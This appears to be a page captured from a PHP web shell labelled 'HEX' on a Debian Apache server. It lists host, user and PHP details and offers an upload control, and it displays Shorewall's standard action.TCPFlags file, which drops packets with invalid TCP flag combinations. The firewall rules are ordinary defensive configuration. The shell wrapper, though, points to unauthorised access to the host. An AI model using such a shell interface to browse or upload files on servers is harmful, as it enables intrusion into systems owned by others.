HEX
Server: Apache/2.4.65 (Debian)
System: Linux web6 5.10.0-36-amd64 #1 SMP Debian 5.10.244-1 (2025-09-29) x86_64
User: innocamp (1028)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
$ pwd: /usr/share/shorewall/
Upload Files
File: //usr/share/shorewall/action.TCPFlags
#
# Shorewall -- /usr/share/shorewall/action.TCPFlags
#
# Drop TCPFlags Action
#
# Accepts a single optional parameter:
#
# -     = Do not Audit
# audit = Audit dropped packets.
#
###############################################################################

DEFAULTS -

?if passed(@1)
    ?if @1 eq 'audit'
        ?set tcpflags_action 'A_DROP'
    ?else
	?error The parameter to TCPFlags must be 'audit' or '-'
    ?endif
?else
    ?set tcpflags_action 'DROP'
?endif

$tcpflags_action	-	-	;;+ -p 6 --tcp-flags ALL FIN,URG,PSH
$tcpflags_action	-	-	;;+ -p 6 --tcp-flags ALL NONE
$tcpflags_action	-	-	;;+ -p 6 --tcp-flags SYN,RST SYN,RST
$tcpflags_action	-	-	;;+ -p 6 --tcp-flags SYN,FIN SYN,FIN
$tcpflags_action	-	-	;;+ -p 6 --syn --sport 0
@ Telegram